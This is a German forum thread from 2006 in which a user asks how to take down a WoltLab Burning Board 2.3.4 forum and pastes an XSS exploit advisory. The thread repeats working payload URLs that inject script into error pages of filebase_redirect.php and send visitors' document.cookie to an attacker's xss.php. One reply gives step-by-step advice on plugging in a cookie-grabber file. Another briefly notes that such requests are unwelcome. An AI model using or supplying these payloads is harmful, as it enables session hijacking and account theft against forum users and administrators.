wbb 2.3.4 peer exploit lahmlegen

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von Decryptor, 7. Mai 2006 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. 7. Mai 2006
    hi ich wollte mal fragen wie ich das wbb mit dem explit lahmlegen kann

    PHP:
    discovered a xss in wbb again  ;)
     in
    wbb     / acp / lib / class_db_mysql . php

    in the 123.line

    $errormsg      .=  "<b>Script:</b> " . getenv ( "REQUEST_URI" ). "\n<br>" ;

     hmm what can we  do  with that ?
    if      there is an sql db error you may  do

    /     wbb / xx . php ?< script > location . href = 'http://yoursite.com/xss.php?cook=' + escape ( document . cookie )</ script >

    or      you may  use  filebase mod  for  make an sql error

    like that

    http     : //www.wbbsite.com/filebase_redirect.php?fid='<script>location.href='http://yoursite.com/xss.php?cook='+escape(document.cookie)</script>

     WwW . SpyMasterSnake . org
    Tontonq      ;)
     Received on Mar 18 2006 
     
  3. 8. Mai 2006
    einen cookiestealer anwenden...glaub aber solche anfragen sind hier nicht erwünscht


    mfg moep
     
  4. 8. Mai 2006
    Diese Zeile sollte dich interessieren:
    Code:
    http://www.wbbsite.com/filebase_redirect.php?fid='<script>location.href='http://yoursite.com/xss.php?cook='+escape(document.cookie)</script>
    Ich sage mal nur so viel dazu,dass du dir einfach die Url zur filebase_redirect.php ändern musst(muss die php bleiben,solange du nicht weisst in welcher anderen php son fehler vorkommt) und dann im script tag einfach deine Grap Datei(die die die Cookies ausliest und speicher) einspannen,fertig!

    Einfach mal die Exploit beschreibung lesen.
    Aber gibt schon patches dafür,nur so nebenbei, und das schreiben in php dateien wird auch geloggt..auch nur so nebenbei
     
  5. 8. Mai 2006
    hmm what can we do with that?
    if there is an sql db error you may do

    /wbb/xx.php?<script>location.href='http://yoursite.com/xss.php?cook='+escape(document.cookie)</script>

    or you may use filebase mod for make an sql error

    like that

    http://www.wbbsite.com/filebase_redirect.php?fid='<script>location.href='http://yoursite.com/xss.php?cook='+escape(document.cookie)</script>

    noch fragen ?
    einfach mal auf die fehlersuche machen
     
  6. Video Script

    Videos zum Themenbereich

    * gefundene Videos auf YouTube, anhand der Überschrift.